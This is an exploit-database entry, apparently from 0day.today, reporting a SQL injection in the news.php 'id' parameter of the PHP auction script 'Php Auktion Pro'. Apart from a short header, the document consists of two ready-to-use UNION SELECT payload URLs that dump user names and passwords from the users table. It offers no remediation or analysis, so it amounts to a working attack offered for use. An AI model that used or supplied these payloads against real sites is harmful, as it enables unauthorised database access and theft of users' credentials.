Php Auktion Pro SQL (news.php) SQL Injection Vulnerability

2010-02-23T00:00:00
ID 1337DAY-ID-11035
Type zdt
Reporter Easy Laster
Modified 2010-02-23T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==========================================================
Php Auktion Pro SQL (news.php) SQL Injection Vulnerability
==========================================================

----------------------------Information------------------------------------------------
+Name : Php Auktion Pro SQL Injection news.php
+Autor : Easy Laster
+Date   : 22.02.2010
+Script  : Php Auktion Pro
+Download : -----
+Price : 34,90?
+Language :PHP

----------------------------------------------------------------------------------------
+Vulnerability : www.site.com/auktionblau/news.php?id=
+Exploitable   : www.site.com/auktionblau/news.php?id=null+union+select+1,2,convert
(password using utf8),4,5+from+users#
 
or
 
www.site.com/auktionblau/news.php?id=null+union+select+1,2,concat
(name,0x3a,password),4,5+from+users#
 
 
-----------------------------------------------------------------------------------------



#  0day.today [2018-03-10]  #